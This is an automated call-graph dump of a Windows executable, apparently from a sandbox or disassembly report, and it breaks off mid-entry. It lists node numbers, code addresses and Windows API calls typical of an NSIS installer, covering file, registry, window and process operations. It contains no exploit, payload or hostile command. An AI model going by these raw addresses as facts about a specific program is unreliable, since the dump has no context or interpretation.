40724e lstrcpynW lstrcmpW 4811->4813 4814 407280 4813->4814 4815 407286 lstrcpynW 4813->4815 4814->4815 4815->4812 3336 402713 3351 406035 lstrcpynW 3336->3351 3338 40272c 3352 406035 lstrcpynW 3338->3352 3340 402743 3343 402752 3340->3343 3344 40145c 18 API calls 3340->3344 3341 402738 3341->3340 3342 40145c 18 API calls 3341->3342 3342->3340 3345 402761 3343->3345 3346 40145c 18 API calls 3343->3346 3344->3343 3353 40145c 3345->3353 3346->3345 3351->3338 3352->3341 3361 406831 3353->3361 3356 401497 3358 4062cf lstrlenW wvsprintfW 3356->3358 3401 406113 3358->3401 3365 40683e 3361->3365 3362 406aab 3363 401488 3362->3363 3396 406035 lstrcpynW 3362->3396 3363->3356 3380 406064 3363->3380 3365->3362 3366 4068ff GetVersion 3365->3366 3367 406a72 lstrlenW 3365->3367 3368 406831 10 API calls 3365->3368 3373 406064 5 API calls 3365->3373 3394 405f7d wsprintfW 3365->3394 3395 406035 lstrcpynW 3365->3395 3378 40690c 3366->3378 3367->3365 3368->3367 3372 40697e GetSystemDirectoryW 3372->3378 3373->3365 3374 406991 GetWindowsDirectoryW 3374->3378 3375 406831 10 API calls 3375->3378 3376 406a0b lstrcatW 3376->3365 3377 4069c5 SHGetSpecialFolderLocation 3377->3378 3379 4069dd SHGetPathFromIDListW CoTaskMemFree 3377->3379 3378->3365 3378->3372 3378->3374 3378->3375 3378->3376 3378->3377 3389 405eff RegOpenKeyExW 3378->3389 3379->3378 3387 406071 3380->3387 3381 4060e7 3382 4060ed CharPrevW 3381->3382 3384 40610d 3381->3384 3382->3381 3383 4060da CharNextW 3383->3381 3383->3387 3384->3356 3386 4060c6 CharNextW 3386->3387 3387->3381 3387->3383 3387->3386 3388 4060d5 CharNextW 3387->3388 3397 405d32 3387->3397 3388->3383 3390 405f33 RegQueryValueExW 3389->3390 3391 405f78 3389->3391 3392 405f55 RegCloseKey 3390->3392 3391->3378 3392->3391 3394->3365 3395->3365 3396->3363 3398 405d38 3397->3398 3399 405d4e 3398->3399 3400 405d3f CharNextW 3398->3400 3399->3387 3400->3398 3402 40613c 3401->3402 3403 40611f 3401->3403 3404 40277f WritePrivateProfileStringW 3402->3404 3406 4061b3 3402->3406 3407 406159 3402->3407 3403->3404 3405 406129 CloseHandle 3403->3405 3405->3404 3406->3404 3408 4061bc lstrcatW lstrlenW WriteFile 3406->3408 3407->3408 3409 406162 GetFileAttributesW 3407->3409 3408->3404 3414 405e7c GetFileAttributesW CreateFileW 3409->3414 3411 40617e 3411->3404 3412 4061a8 SetFilePointer 3411->3412 3413 40618e WriteFile 3411->3413 3412->3406 3413->3412 3414->3411 4816 402797 4817 40145c 18 API calls 4816->4817 4818 4027ae 4817->4818 4819 40145c 18 API calls 4818->4819 4820 4027b7 4819->4820 4821 40145c 18 API calls 4820->4821 4822 4027c0 GetPrivateProfileStringW lstrcmpW 4821->4822 4823 401e9a 4824 40145c 18 API calls 4823->4824 4825 401ea1 4824->4825 4826 401446 18 API calls 4825->4826 4827 401eab wsprintfW 4826->4827 3789 401a1f 3790 40145c 18 API calls 3789->3790 3791 401a26 3790->3791 3792 4062cf 11 API calls 3791->3792 3793 401a49 3792->3793 3794 401a64 3793->3794 3795 401a5c 3793->3795 3864 406035 lstrcpynW 3794->3864 3863 406035 lstrcpynW 3795->3863 3798 401a62 3801 406064 5 API calls 3798->3801 3799 401a6f 3865 40674e lstrlenW CharPrevW 3799->3865 3804 401a81 3801->3804 3803 406301 2 API calls 3803->3804 3804->3803 3807 401a98 CompareFileTime 3804->3807 3808 401ba9 3804->3808 3810 401b5d 3804->3810 3812 4062cf 11 API calls 3804->3812 3820 406035 lstrcpynW 3804->3820 3823 406831 18 API calls 3804->3823 3835 401b50 3804->3835 3841 405e7c GetFileAttributesW CreateFileW 3804->3841 3868 405e5c GetFileAttributesW 3804->3868 3871 405ccc 3804->3871 3807->3804 3809 404f9e 25 API calls 3808->3809 3811 401bb3 3809->3811 3813 404f9e 25 API calls 3810->3813 3842 40337f 3811->3842 3812->3804 3815 401b70 3813->3815 3818 4062cf 11 API calls 3815->3818 3817 4062cf 11 API calls 3819 401bda 3817->3819 3824 401b8b 3818->3824 3821 401be9 SetFileTime 3819->3821 3822 401bf8 CloseHandle 3819->3822 3820->3804 3821->3822 3822->3824 3825 401c09 3822->3825 3823->3804 3826 401c21 3825->3826 3827 401c0e 3825->3827 3829 406831 18 API calls 3826->3829 3828 406831 18 API calls 3827->3828 3831 401c16 lstrcatW 3828->3831 3832 401c29 3829->3832 3831->3832 3833 4062cf 11 API calls 3832->3833 3834 401c34 3833->3834 3838 405ccc MessageBoxIndirectW 3834->3838 3836 401b93 3835->3836 3837 401b53 3835->3837 3840 4062cf 11 API calls 3836->3840 3839 4062cf 11 API calls 3837->3839 3838->3824 3839->3810 3840->3824 3841->3804 3843 40339a 3842->3843 3844 4033c7 3843->3844 3877 403368 SetFilePointer 3843->3877 3875 403336 ReadFile 3844->3875 3848 403546 3850 40354a 3848->3850 3854 40356e 3848->3854 3849 4033eb GetTickCount 3857 401bc6 3849->3857 3859 403438 3849->3859 3851 403336 ReadFile 3850->3851 3851->3857 3852 403336 ReadFile 3852->3859 3853 403336 ReadFile 3853->3854 3854->3853 3855 40358d WriteFile 3854->3855 3854->3857 3856 4035a1 3855->3856 3855->3857 3856->3854 3856->3857 3857->3817 3858 40348a GetTickCount 3858->3859 3859->3852 3859->3857 3859->3858 3860 4034af MulDiv wsprintfW 3859->3860 3861 4034f3 WriteFile 3859->3861 3862 404f9e 25 API calls 3860->3862 3861->3857 3861->3859 3862->3859 3863->3798 3864->3799 3866 401a75 lstrcatW 3865->3866 3867 40676b lstrcatW 3865->3867 3866->3798 3867->3866 3869 405e79 3868->3869 3870 405e6b SetFileAttributesW 3868->3870 3869->3804 3870->3869 3872 405ce1 3871->3872 3873 405d2f 3872->3873 3874 405cf7 MessageBoxIndirectW 3872->3874 3873->3804 3874->3873 3876 403357 3875->3876 3876->3848 3876->3849 3876->3857 3877->3844 4828 40209f GetDlgItem GetClientRect 4829 40145c 18 API calls 4828->4829 4830 4020cf LoadImageW SendMessageW 4829->4830 4831 4030e3 4830->4831 4832 4020ed DeleteObject 4830->4832 4832->4831 4833 402b9f 4834 401446 18 API calls 4833->4834 4838 402ba7 4834->4838 4835 402c4a 4836 401446 18 API calls 4845 402c3d 4836->4845 4837 402bdf ReadFile 4837->4838 4837->4845 4838->4835 4838->4837 4839 402c06 MultiByteToWideChar 4838->4839 4840 402c3f 4838->4840 4842 402c4f 4838->4842 4838->4845 4839->4838 4839->4842 4846 405f7d wsprintfW 4840->4846 4843 402c6b SetFilePointer 4842->4843 4842->4845 4843->4845 4844 402d17 ReadFile 4844->4845 4845->4835 4845->4836 4845->4844 4846->4835 4847 402b23 GlobalAlloc 4848 402b39 4847->4848 4849 402b4b 4847->4849 4850 401446 18 API calls 4848->4850 4851 40145c 18 API calls 4849->4851 4853 402b41 4850->4853 4852 402b52 WideCharToMultiByte lstrlenA 4851->4852 4852->4853 4854 402b84 WriteFile 4853->4854 4855 402b93 4853->4855 4854->4855 4856 402384 GlobalFree 4854->4856 4856->4855 4858 4040a3 4859 4040b0 lstrcpynW lstrlenW 4858->4859 4860 4040ad 4858->4860 4860->4859 3428 4054a5 3429 4055f9 3428->3429 3430 4054bd 3428->3430 3432 40564a 3429->3432 3433 40560a GetDlgItem GetDlgItem 3429->3433 3430->3429 3431 4054c9 3430->3431 3434 4054d4 SetWindowPos 3431->3434 3435 4054e7 3431->3435 3437 4056a4 3432->3437 3442 40139d 80 API calls 3432->3442 3436 403d6b 19 API calls 3433->3436 3434->3435 3439 405504 3435->3439 3440 4054ec ShowWindow 3435->3440 3441 405634 SetClassLongW 3436->3441 3443 4055f4 3437->3443 3498 403ddb 3437->3498 3444 405526 3439->3444 3445 40550c DestroyWindow 3439->3445 3440->3439 3446 40141d 80 API calls 3441->3446 3447 40567c 3442->3447 3449 40552b SetWindowLongW 3444->3449 3450 40553c 3444->3450 3448 405908 3445->3448 3446->3432 3447->3437 3451 405680 SendMessageW 3447->3451 3448->3443 3459 405939 ShowWindow 3448->3459 3449->3443 3454 4055e5 3450->3454 3455 405548 GetDlgItem 3450->3455 3451->3443 3452 40141d 80 API calls 3468 4056b6 3452->3468 3453 40590a DestroyWindow KiUserCallbackDispatcher 3453->3448 3518 403df6 3454->3518 3456 405578 3455->3456 3457 40555b SendMessageW IsWindowEnabled 3455->3457 3461 405585 3456->3461 3462 4055cc SendMessageW 3456->3462 3463 405598 3456->3463 3473 40557d 3456->3473 3457->3443 3457->3456 3459->3443 3460 406831 18 API calls 3460->3468 3461->3462 3461->3473 3462->3454 3465 4055a0 3463->3465 3466 4055b5 3463->3466 3512 40141d 3465->3512 3469 40141d 80 API calls 3466->3469 3467 4055b3 3467->3454 3468->3443 3468->3452 3468->3453 3468->3460 3470 403d6b 19 API calls 3468->3470 3489 40584a DestroyWindow 3468->3489 3501 403d6b 3468->3501 3472 4055bc 3469->3472 3470->3468 3472->3454 3472->3473 3515 403d44 3473->3515 3475 405731 GetDlgItem 3476 405746 3475->3476 3477 40574f ShowWindow KiUserCallbackDispatcher 3475->3477 3476->3477 3504 403db1 KiUserCallbackDispatcher 3477->3504 3479 405779 EnableWindow 3482 40578d 3479->3482 3480 405792 GetSystemMenu EnableMenuItem SendMessageW 3481 4057c2 SendMessageW 3480->3481 3480->3482 3481->3482 3482->3480 3505 403dc4 SendMessageW 3482->3505 3506 406035 lstrcpynW 3482->3506 3485 4057f0 lstrlenW 3486 406831 18 API calls 3485->3486 3487 405806 SetWindowTextW 3486->3487 3507 40139d 3487->3507 3489->3448 3490 405864 CreateDialogParamW 3489->3490 3490->3448 3491 405897 3490->3491 3492 403d6b 19 API calls 3491->3492 3493 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3492->3493 3494 40139d 80 API calls 3493->3494 3495 4058e8 3494->3495 3495->3443 3496 4058f0 ShowWindow 3495->3496 3497 403ddb SendMessageW 3496->3497 3497->3448 3499 403df3 3498->3499 3500 403de4 SendMessageW 3498->3500 3499->3468 3500->3499 3502 406831 18 API calls 3501->3502 3503 403d76 SetDlgItemTextW 3502->3503 3503->3475 3504->3479 3505->3482 3506->3485 3510 4013a4 3507->3510 3508 401410 3508->3468 3510->3508 3511 4013dd MulDiv SendMessageW 3510->3511 3532 4015a0 3510->3532 3511->3510 3513 40139d 80 API calls 3512->3513 3514 401432 3513->3514 3514->3473 3516 403d51 SendMessageW 3515->3516 3517 403d4b 3515->3517 3516->3467 3517->3516 3519 403e0b GetWindowLongW 3518->3519 3529 403e94 3518->3529 3520 403e1c 3519->3520 3519->3529 3521 403e2b GetSysColor 3520->3521 3522 403e2e 3520->3522 3521->3522 3523 403e34 SetTextColor 3522->3523 3524 403e3e SetBkMode 3522->3524 3523->3524 3525 403e56 GetSysColor 3524->3525 3526 403e5c 3524->3526 3525->3526 3527 403e63 SetBkColor 3526->3527 3528 403e6d 3526->3528 3527->3528 3528->3529 3530 403e80 DeleteObject 3528->3530 3531 403e87 CreateBrushIndirect 3528->3531 3529->3443 3530->3531 3531->3529 3533 4015fa 3532->3533 3613 40160c 3532->3613 3534 401601 3533->3534 3535 401742 3533->3535 3536 401962 3533->3536 3537 4019ca 3533->3537 3538 40176e 3533->3538 3539 401650 3533->3539 3540 4017b1 3533->3540 3541 401672 3533->3541 3542 401693 3533->3542 3543 401616 3533->3543 3544 4016d6 3533->3544 3545 401736 3533->3545 3546 401897 3533->3546 3547 4018db 3533->3547 3548 40163c 3533->3548 3549 4016bd 3533->3549 3533->3613 3550 4062cf 11 API calls 3534->3550 3556 401751 ShowWindow 3535->3556 3557 401758 3535->3557 3561 40145c 18 API calls 3536->3561 3554 40145c 18 API calls 3537->3554 3558 40145c 18 API calls 3538->3558 3578 4062cf 11 API calls 3539->3578 3562 40145c 18 API calls 3540->3562 3559 40145c 18 API calls 3541->3559 3563 401446 18 API calls 3542->3563 3553 40145c 18 API calls 3543->3553 3568 401446 18 API calls 3544->3568 3544->3613 3545->3613 3666 405f7d wsprintfW 3545->3666 3560 40145c 18 API calls 3546->3560 3551 40145c 18 API calls 3547->3551 3555 401647 PostQuitMessage 3548->3555 3548->3613 3552 4062cf 11 API calls 3549->3552 3550->3613 3564 4018e2 3551->3564 3565 4016c7 SetForegroundWindow 3552->3565 3566 40161c 3553->3566 3567 4019d1 SearchPathW 3554->3567 3555->3613 3556->3557 3569 401765 ShowWindow 3557->3569 3557->3613 3570 401775 3558->3570 3571 401678 3559->3571 3572 40189d 3560->3572 3573 401968 GetFullPathNameW 3561->3573 3574 4017b8 3562->3574 3575 40169a 3563->3575 3576 40145c 18 API calls 3564->3576 3565->3613 3577 4062cf 11 API calls 3566->3577 3567->3545 3567->3613 3568->3613 3569->3613 3579 4062cf 11 API calls 3570->3579 3580 4062cf 11 API calls 3571->3580 3657 406301 FindFirstFileW 3572->3657 3582 4019a1 3573->3582 3583 40197f 3573->3583 3584 4062cf 11 API calls 3574->3584 3586 4062cf 11 API calls 3575->3586 3587 4018eb 3576->3587 3588 401627 3577->3588 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3579->3590 3591 401683 3580->3591 3596 4019b8 GetShortPathNameW 3582->3596 3582->3613 3583->3582 3608 406301 2 API calls 3583->3608 3593 4017c9 3584->3593 3594 4016a7 Sleep 3586->3594 3597 40145c 18 API calls 3587->3597 3598 404f9e 25 API calls 3588->3598 3599 40139d 65 API calls 3589->3599 3600 40179a 3590->3600 3590->3613 3606 404f9e 25 API calls 3591->3606 3639 405d85 CharNextW CharNextW 3593->3639 3594->3613 3596->3613 3604 4018f5 3597->3604 3598->3613 3599->3613 3605 4062cf 11 API calls 3600->3605 3601 4018c2 3609 4062cf 11 API calls 3601->3609 3602 4018a9 3607 4062cf 11 API calls 3602->3607 3611 4062cf 11 API calls 3604->3611 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3615 405d32 CharNextW 3610->3615 3634 4062cf 11 API calls 3610->3634 3616 401902 MoveFileW 3611->3616 3612->3582 3665 406035 lstrcpynW 3612->3665 3613->3510 3614->3591 3617 40186e 3614->3617 3619 4017e6 CreateDirectoryW 3615->3619 3620 401912 3616->3620 3621 40191e 3616->3621 3645 404f9e 3617->3645 3619->3610 3623 4017fe GetLastError 3619->3623 3620->3591 3627 406301 2 API calls 3621->3627 3629 401942 3621->3629 3625 401827 GetFileAttributesW 3623->3625 3626 40180b GetLastError 3623->3626 3625->3610 3630 4062cf 11 API calls 3626->3630 3631 401929 3627->3631 3633 4062cf 11 API calls 3629->3633 3630->3610 3631->3629 3660 406c94 3631->3660 3632 401882 SetCurrentDirectoryW 3632->3613 3635 40195c 3633->3635 3634->3610 3635->3613 3638 404f9e 25 API calls 3638->3629 3640 405da2 3639->3640 3644 405db4 3639->3644 3642 405daf CharNextW 3640->3642 3640->3644 3641 405dd8 3641->3610 3642->3641 3643 405d32 CharNextW 3643->3644 3644->3641 3644->3643 3646 404fb7 3645->3646 3655 401875 3645->3655 3647 404fd5 lstrlenW 3646->3647 3648 406831 18 API calls 3646->3648 3649 404fe3 lstrlenW 3647->3649 3650 404ffe 3647->3650 3648->3647 3651 404ff5 lstrcatW 3649->3651 3649->3655 3652 405011 3650->3652 3653 405004 SetWindowTextW 3650->3653 3651->3650 3654 405017 SendMessageW SendMessageW SendMessageW 3652->3654 3652->3655 3653->3652 3654->3655 3656 406035 lstrcpynW 3655->3656 3656->3632 3658 4018a5 3657->3658 3659 406317 FindClose 3657->3659 3658->3601 3658->3602 3659->3658 3667 406328 GetModuleHandleA 3660->3667 3664 401936 3664->3638 3665->3582 3666->3613 3668 406340 LoadLibraryA 3667->3668 3669 40634b GetProcAddress 3667->3669 3668->3669 3670 406359 3668->3670 3669->3670 3670->3664 3671 406ac5 lstrcpyW 3670->3671 3672 406b13 GetShortPathNameW 3671->3672 3673 406aea 3671->3673 3674 406b2c 3672->3674 3675 406c8e 3672->3675 3697 405e7c GetFileAttributesW CreateFileW 3673->3697 3674->3675 3677 406b34 WideCharToMultiByte 3674->3677 3675->3664 3677->3675 3679 406b51 WideCharToMultiByte 3677->3679 3678 406af3 CloseHandle GetShortPathNameW 3678->3675 3680 406b0b 3678->3680 3679->3675 3681 406b69 wsprintfA 3679->3681 3680->3672 3680->3675 3682 406831 18 API calls 3681->3682 3683 406b95 3682->3683 3698 405e7c GetFileAttributesW CreateFileW 3683->3698 3685 406ba2 3685->3675 3686 406baf GetFileSize GlobalAlloc 3685->3686 3687 406bd0 ReadFile 3686->3687 3688 406c84 CloseHandle 3686->3688 3687->3688 3689 406bea 3687->3689 3688->3675 3689->3688 3699 405de2 lstrlenA 3689->3699 3692 406c03 lstrcpyA 3695 406c25 3692->3695 3693 406c17 3694 405de2 4 API calls 3693->3694 3694->3695 3696 406c5c SetFilePointer WriteFile GlobalFree 3695->3696 3696->3688 3697->3678 3698->3685 3700 405e23 lstrlenA 3699->3700 3701 405e2b 3700->3701 3702 405dfc lstrcmpiA 3700->3702 3701->3692 3701->3693 3702->3701 3703 405e1a CharNextA 3702->3703 3703->3700 4861 402da5 4862 402dac 4861->4862 4864 4030e3 4861->4864 4863 401446 18 API calls 4862->4863 4865 402db8 4863->4865 4866 402dbf SetFilePointer 4865->4866 4866->4864 4867 402dcf 4866->4867 4867->4864 4869 405f7d wsprintfW 4867->4869 4869->4864 4870 4049a8 GetDlgItem GetDlgItem 4871 4049fe 7 API calls 4870->4871 4876 404c16 4870->4876 4872 404aa2 DeleteObject 4871->4872 4873 404a96 SendMessageW 4871->4873 4874 404aad 4872->4874 4873->4872 4877 404ae4 4874->4877 4879 406831 18 API calls 4874->4879 4875 404cfb 4878 404da0 4875->4878 4883 404c09 4875->4883 4889 404d4a SendMessageW 4875->4889 4876->4875 4887 40487a 5 API calls 4876->4887 4902 404c86 4876->4902 4882 403d6b 19 API calls 4877->4882 4880 404db5 4878->4880 4881 404da9 SendMessageW 4878->4881 4885 404ac6 SendMessageW SendMessageW 4879->4885 4891 404dc7 ImageList_Destroy 4880->4891 4892 404dce 4880->4892 4898 404dde 4880->4898 4881->4880 4888 404af8 4882->4888 4884 403df6 8 API calls 4883->4884 4890 404f97 4884->4890 4885->4874 4886 404ced SendMessageW 4886->4875 4887->4902 4893 403d6b 19 API calls 4888->4893 4889->4883 4895 404d5f SendMessageW 4889->4895 4891->4892 4897 404dd7 GlobalFree 4892->4897 4892->4898 4907 404b09 4893->4907 4894 404f48 4894->4883 4899 404f5d ShowWindow GetDlgItem ShowWindow 4894->4899 4896 404d72 4895->4896 4904 404d83 SendMessageW 4896->4904 4897->4898 4898->4894 4903 40141d 80 API calls 4898->4903 4914 404e10 4898->4914 4899->4883 4900 404bd6 GetWindowLongW SetWindowLongW 4901 404bf0 4900->4901 4905 404bf6 ShowWindow 4901->4905 4906 404c0e 4901->4906 4902->4875 4902->4886 4903->4914 4904->4878 4921 403dc4 SendMessageW 4905->4921 4922 403dc4 SendMessageW 4906->4922 4907->4900 4908 404b65 SendMessageW 4907->4908 4909 404bd0 4907->4909 4912 404b93 SendMessageW 4907->4912 4913 404ba7 SendMessageW 4907->4913 4908->4907 4909->4900 4909->4901 4912->4907 4913->4907 4916 404e3e SendMessageW 4914->4916 4920 404e54 4914->4920 4915 404f1f InvalidateRect 4915->4894 4917 404f35 4915->4917 4916->4920 4918 4043d9 21 API calls 4917->4918 4918->4894 4919 404ecd SendMessageW SendMessageW 4919->4920 4920->4915 4920->4919 4921->4883 4922->4876 3878 4038af #17 SetErrorMode OleInitialize 3879 406328 3 API calls 3878->3879 3880 4038f2 SHGetFileInfoW 3879->3880 3952 406035 lstrcpynW 3880->3952 3882 40391d GetCommandLineW 3953 406035 lstrcpynW 3882->3953 3884 40392f GetModuleHandleW 3885 403947 3884->3885 3886 405d32 CharNextW 3885->3886 3887 403956 CharNextW 3886->3887 3897 403968 3887->3897 3888 403a02 3889 403a21 GetTempPathW 3888->3889 3954 4037f8 3889->3954 3891 403a37 3892 403a3b GetWindowsDirectoryW lstrcatW 3891->3892 3893 403a5f DeleteFileW 3891->3893 3895 4037f8 11 API calls 3892->3895 3962 4035b3 GetTickCount GetModuleFileNameW 3893->3962 3894 405d32 CharNextW 3894->3897 3898 403a57 3895->3898 3897->3888 3897->3894 3908 403a04 3897->3908 3898->3893 3900 403af8 3898->3900 3899 403a73 3899->3900 3902 405d32 CharNextW 3899->3902 3939 403add 3899->3939 4047 403885 3900->4047 3921 403a8a 3902->3921 3905 403aed 3909 406113 9 API calls 3905->3909 3906 403bfa 3910 403c7d 3906->3910 3912 406328 3 API calls 3906->3912 3907 403b0d 3911 405ccc MessageBoxIndirectW 3907->3911 4054 406035 lstrcpynW 3908->4054 3909->3900 3913 403b1b ExitProcess 3911->3913 3915 403c09 3912->3915 3918 406328 3 API calls 3915->3918 3916 403b23 lstrcatW lstrcmpiW 3916->3900 3920 403b3f CreateDirectoryW SetCurrentDirectoryW 3916->3920 3917 403ab5 4055 4067aa 3917->4055 3922 403c12 3918->3922 3924 403b62 3920->3924 3925 403b57 3920->3925 3921->3916 3921->3917 3926 406328 3 API calls 3922->3926 4072 406035 lstrcpynW 3924->4072 4071 406035 lstrcpynW 3925->4071 3930 403c1b 3926->3930 3929 403b70 4073 406035 lstrcpynW 3929->4073 3933 403c69 ExitWindowsEx 3930->3933 3938 403c29 GetCurrentProcess 3930->3938 3933->3910 3935 403c76 3933->3935 3934 403ad2 4070 406035 lstrcpynW 3934->4070 3937 40141d 80 API calls 3935->3937 3937->3910 3942 403c39 3938->3942 3990 405958 3939->3990 3940 406831 18 API calls 3941 403b98 DeleteFileW 3940->3941 3943 403ba5 CopyFileW 3941->3943 3949 403b7f 3941->3949 3942->3933 3943->3949 3944 403bee 3945 406c94 42 API calls 3944->3945 3947 403bf5 3945->3947 3946 406c94 42 API calls 3946->3949 3947->3900 3948 406831 18 API calls 3948->3949 3949->3940 3949->3944 3949->3946 3949->3948 3951 403bd9 CloseHandle 3949->3951 4074 405c6b CreateProcessW 3949->4074 3951->3949 3952->3882 3953->3884 3955 406064 5 API calls 3954->3955 3956 403804 3955->3956 3957 40380e 3956->3957 3958 40674e 3 API calls 3956->3958 3957->3891 3959 403816 CreateDirectoryW 3958->3959 3960 405eab 2 API calls 3959->3960 3961 40382a 3960->3961 3961->3891 4077 405e7c GetFileAttributesW CreateFileW 3962->4077 3964 4035f3 3984 403603 3964->3984 4078 406035 lstrcpynW 3964->4078 3966 403619 4079 40677d lstrlenW 3966->4079 3970 40362a GetFileSize 3971 403726 3970->3971 3983 403641 3970->3983 4084 4032d2 3971->4084 3973 40372f 3975 40376b GlobalAlloc 3973->3975 3973->3984 4096 403368 SetFilePointer 3973->4096 3974 403336 ReadFile 3974->3983 4095 403368 SetFilePointer 3975->4095 3977 4037e9 3980 4032d2 6 API calls 3977->3980 3979 40374c 3982 403336 ReadFile 3979->3982 3980->3984 3981 403786 3985 40337f 33 API calls 3981->3985 3986 403757 3982->3986 3983->3971 3983->3974 3983->3977 3983->3984 3987 4032d2 6 API calls 3983->3987 3984->3899 3988 403792 3985->3988 3986->3975 3986->3984 3987->3983 3988->3984 3988->3988 3989 4037c0 SetFilePointer 3988->3989 3989->3984 3991 406328 3 API calls 3990->3991 3992 40596c 3991->3992 3993 405972 3992->3993 3994 405984 3992->3994 4110 405f7d wsprintfW 3993->4110 3995 405eff 3 API calls 3994->3995 3996 4059b5 3995->3996 3997 4059d4 lstrcatW 3996->3997 3999 405eff 3 API calls 3996->3999 4000 405982 3997->4000 3999->3997 4101 403ec1 4000->4101 4003 4067aa 18 API calls 4004 405a06 4003->4004 4005 405a9c 4004->4005 4007 405eff 3 API calls 4004->4007 4006 4067aa 18 API calls 4005->4006 4008 405aa2 4006->4008 4009 405a38 4007->4009 4010 405ab2 4008->4010 4012 406831 18 API calls 4008->4012 4009->4005 4015 405a5b lstrlenW 4009->4015 4021 405d32 CharNextW 4009->4021 4011 405ad2 LoadImageW 4010->4011 4112 403ea0 4010->4112 4013 405b92 4011->4013 4014 405afd RegisterClassW 4011->4014 4012->4010 4020 40141d 80 API calls 4013->4020 4019 405b45 SystemParametersInfoW CreateWindowExW 4014->4019 4045 405b9c 4014->4045 4016 405a69 lstrcmpiW 4015->4016 4017 405a8f 4015->4017 4016->4017 4023 405a79 GetFileAttributesW 4016->4023 4025 40674e 3 API calls 4017->4025 4019->4013 4026 405b98 4020->4026 4022 405a56 4021->4022 4022->4015 4027 405a85 4023->4027 4024 405ac8 4024->4011 4028 405a95 4025->4028 4031 403ec1 19 API calls 4026->4031 4026->4045 4027->4017 4029 40677d 2 API calls 4027->4029 4111 406035 lstrcpynW 4028->4111 4029->4017 4032 405ba9 4031->4032 4033 405bb5 ShowWindow LoadLibraryW 4032->4033 4034 405c38 4032->4034 4035 405bd4 LoadLibraryW 4033->4035 4036 405bdb GetClassInfoW 4033->4036 4037 405073 83 API calls 4034->4037 4035->4036 4038 405c05 DialogBoxParamW 4036->4038 4039 405bef GetClassInfoW RegisterClassW 4036->4039 4040 405c3e 4037->4040 4041 40141d 80 API calls 4038->4041 4039->4038 4042 405c42 4040->4042 4043 405c5a 4040->4043 4041->4045 4042->4045 4046 40141d 80 API calls 4042->4046 4044 40141d 80 API calls 4043->4044 4044->4045 4045->3905 4046->4045 4048 40389d 4047->4048 4049 40388f CloseHandle 4047->4049 4119 403caf 4048->4119 4049->4048 4054->3889 4172 406035 lstrcpynW 4055->4172 4057 4067bb 4058 405d85 4 API calls 4057->4058 4059 4067c1 4058->4059 4060 406064 5 API calls 4059->4060 4067 403ac3 4059->4067 4063 4067d1 4060->4063 4061 406809 lstrlenW 4062 406810 4061->4062 4061->4063 4065 40674e 3 API calls 4062->4065 4063->4061 4064 406301 2 API calls 4063->4064 4063->4067 4068 40677d 2 API calls 4063->4068 4064->4063 4066 406816 GetFileAttributesW 4065->4066 4066->4067 4067->3900 4069 406035 lstrcpynW 4067->4069 4068->4061 4069->3934 4070->3939 4071->3924 4072->3929 4073->3949 4075 405ca6 4074->4075 4076 405c9a CloseHandle 4074->4076 4075->3949 4076->4075 4077->3964 4078->3966 4080 40678c 4079->4080 4081 406792 CharPrevW 4080->4081 4082 40361f 4080->4082 4081->4080 4081->4082 4083 406035 lstrcpynW 4082->4083 4083->3970 4085 4032f3 4084->4085 4086 4032db 4084->4086 4089 403303 GetTickCount 4085->4089 4090 4032fb 4085->4090 4087 4032e4 DestroyWindow 4086->4087 4088 4032eb 4086->4088 4087->4088 4088->3973 4092 403311 CreateDialogParamW ShowWindow 4089->4092 4093 403334 4089->4093 4097 40635e 4090->4097 4092->4093 4093->3973 4095->3981 4096->3979 4098 40637b PeekMessageW 4097->4098 4099 406371 DispatchMessageW 4098->4099 4100 403301 4098->4100 4099->4098 4100->3973 4102 403ed5 4101->4102 4117 405f7d wsprintfW 4102->4117 4104 403f49 4105 406831 18 API calls 4104->4105 4106 403f55 SetWindowTextW 4105->4106 4108 403f70 4106->4108 4107 403f8b 4107->4003 4108->4107 4109 406831 18 API calls 4108->4109 4109->4108 4110->4000 4111->4005 4118 406035 lstrcpynW 4112->4118 4114 403eb4 4115 40674e 3 API calls 4114->4115 4116 403eba lstrcatW 4115->4116 4116->4024 4117->4104 4118->4114 4120 403cbd 4119->4120 4121 4038a2 4120->4121 4122 403cc2 FreeLibrary GlobalFree 4120->4122 4123 406cc7 4121->4123 4122->4121 4122->4122 4124 4067aa 18 API calls 4123->4124 4125 406cda 4124->4125 4126 406ce3 DeleteFileW 4125->4126 4127 406cfa 4125->4127 4165 4038ae CoUninitialize 4126->4165 4128 406e77 4127->4128 4170 406035 lstrcpynW 4127->4170 4134 406301 2 API calls 4128->4134 4154 406e84 4128->4154 4128->4165 4130 406d25 4131 406d39 4130->4131 4132 406d2f lstrcatW 4130->4132 4135 40677d 2 API calls 4131->4135 4133 406d3f 4132->4133 4137 406d4f lstrcatW 4133->4137 4139 406d57 lstrlenW FindFirstFileW 4133->4139 4136 406e90 4134->4136 4135->4133 4140 40674e 3 API calls 4136->4140 4136->4165 4137->4139 4138 4062cf 11 API calls 4138->4165 4141 406e67 4139->4141 4167 406d7e 4139->4167 4142 406e9a 4140->4142 4141->4128 4144 4062cf 11 API calls 4142->4144 4143 405d32 CharNextW 4143->4167 4145 406ea5 4144->4145 4146 405e5c 2 API calls 4145->4146 4148 406ead RemoveDirectoryW 4146->4148 4151 406ef0 4148->4151 4152 406eb9 4148->4152 4149 406e44 FindNextFileW 4150 406e5c FindClose 4149->4150 4149->4167 4150->4141 4153 404f9e 25 API calls 4151->4153 4152->4154 4155 406ebf 4152->4155 4153->4165 4154->4138 4157 4062cf 11 API calls 4155->4157 4156 4062cf 11 API calls 4156->4167 4159 406ec9 4157->4159 4158 406cc7 72 API calls 4158->4167 4161 404f9e 25 API calls 4159->4161 4160 405e5c 2 API calls 4163 406dfa DeleteFileW 4160->4163 4162 406ed3 4161->4162 4164 406c94 42 API calls 4162->4164 4163->4167 4164->4165 4165->3906 4165->3907 4166 404f9e 25 API calls 4166->4149 4167->4143 4167->4149 4167->4156 4167->4158 4167->4160 4167->4166 4168 404f9e 25 API calls 4167->4168 4169 406c94 42 API calls 4167->4169 4171 406035 lstrcpynW 4167->4171 4168->4167 4169->4167 4170->4130 4171->4167 4172->4057 4923 401cb2 4924 40145c 18 API calls 4923->4924 4925 401c54 4924->4925 4926 4062cf 11 API calls 4925->4926 4927 401c64 4925->4927 4928 401c59 4926->4928 4929 406cc7 81 API calls 4928->4929 4929->4927 3704 4021b5 3705 40145c 18 API calls 3704->3705 3706 4021bb 3705->3706 3707 40145c 